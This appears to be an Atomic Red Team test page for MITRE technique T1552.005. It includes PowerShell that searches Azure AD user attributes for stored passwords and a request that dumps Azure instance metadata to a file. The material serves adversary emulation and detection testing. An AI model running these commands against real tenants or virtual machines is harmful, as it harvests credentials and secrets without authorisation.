# T1552.005 - Cloud Instance Metadata API
Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data.

Most cloud service providers support a Cloud Instance Metadata API which is a service provided to running virtual instances that allows applications to access information about the running virtual instance. Available information generally includes name, security group, and additional metadata including sensitive data such as credentials and UserData scripts that may contain additional secrets. The Instance Metadata API is provided as a convenience to assist in managing applications and is accessible by anyone who can access the instance.(Citation: AWS Instance Metadata API) A cloud metadata API has been used in at least one high profile compromise.(Citation: Krebs Capital One August 2019)

If adversaries have a presence on the running virtual instance, they may query the Instance Metadata API directly to identify credentials that grant access to additional resources. Additionally, adversaries may exploit a Server-Side Request Forgery (SSRF) vulnerability in a public facing web proxy that allows them to gain access to the sensitive information via a request to the Instance Metadata API.(Citation: RedLock Instance Metadata API 2018)

The de facto standard across cloud service providers is to host the Instance Metadata API at <code>http[:]//169.254.169.254</code>.


## Atomic Tests

### Atomic Test #1 - Azure - Search Azure AD User Attributes for Passwords
This test uses the MSOnline Powershell module to retrieve all user attributes for a specified account, which can sometimes contain unsecured credentials. 
Upon successful execution, this test will scan all user attributes for any strings containing "password".
Those unsecured credentials will be output to a text file, as well as the account that they are associated with and the user attribute in which they were found. 
See: https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md

**Supported Platforms:** azure-ad

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: The MSOnline module must be installed.

##### Check Prereq Commands:
```powershell
if (get-command Get-MsolUser -erroraction silentlycontinue){exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
install-module MSOnline

```

In [ ]:
Invoke-AtomicTest T1552.005 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
import-module msonline
$Password = ConvertTo-SecureString -String "T1082Az" -AsPlainText -Force
$Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "None", $Password
Connect-MsolService -Credential $Credential
$users = Get-MsolUser -All;
foreach($user in $users)
{$props = @();$user | Get-Member | foreach-object{$props+=$_.Name}; 
foreach($prop in $props)
{if($user.$prop -like "*password*")
{("[*]" + $user.UserPrincipalName + "[" + $prop + "]" + " : " + $user.$prop) | out-file -filepath $env:temp\T1552.005Test1.txt -append -force}}}
get-content -path $env:temp\T1552.005Test1.txt -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1552.005 -TestNumbers 1

#### Cleanup: 
```powershell
remove-item $env:temp\T1552.005Test1.txt -force -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1552.005 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Azure - Dump Azure Instance Metadata from Virtual MachinesThis test invokes a web request to the default Instance Metadata API of 169.254.169.254 in order to dump the data contained within it to a file. 
See: https://www.sans.org/blog/cloud-instance-metadata-services-imds-/
**Supported Platforms:** iaas:azure#### Attack Commands: Run with `powershell`
```powershell
Invoke-RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance?api-version=2021-02-01" | ConvertTo-Json -Depth 64 > $env:temp\T1552.005Test2.txt
```

In [ ]:
Invoke-AtomicTest T1552.005 -TestNumbers 2

#### Cleanup: 
```powershell
remove-item $env:temp\T1552.005Test2.txt -force -erroraction silentlycontinue
```

In [ ]:
Invoke-AtomicTest T1552.005 -TestNumbers 2 -Cleanup

## Detection
Monitor access to the Instance Metadata API and look for anomalous queries.

It may be possible to detect adversary use of credentials they have obtained such as in [Valid Accounts](https://attack.mitre.org/techniques/T1078).